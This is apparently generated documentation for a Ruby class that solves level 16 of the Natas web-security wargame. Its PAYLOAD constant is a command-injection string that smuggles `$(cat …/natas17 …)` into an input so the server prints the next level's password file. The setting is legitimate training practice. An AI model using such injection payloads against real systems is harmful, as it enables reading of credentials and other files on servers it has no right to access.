Class: NatasLevel16
- Inherits:
-
NatasLevelBase
- Object
- NatasLevelBase
- NatasLevel16
- Defined in:
- lib/natas.rb
Overview
Level 16
Constant Summary collapse
- LEVEL =
16
- PAGE =
'/'
- PAYLOAD =
%(NON_EXIST $(cat #{WEBPASS}/natas17 > /proc/$$/fd/1))
Constants inherited from NatasLevelBase
NatasLevelBase::HOST, NatasLevelBase::LOGIN, NatasLevelBase::PASSWORD_LENGTH, NatasLevelBase::PORT, NatasLevelBase::WEBPASS
Instance Attribute Summary
Attributes inherited from NatasLevelBase
Instance Method Summary collapse
Methods inherited from NatasLevelBase
#get, #initialize, #level, #post
Constructor Details
This class inherits a constructor from NatasLevelBase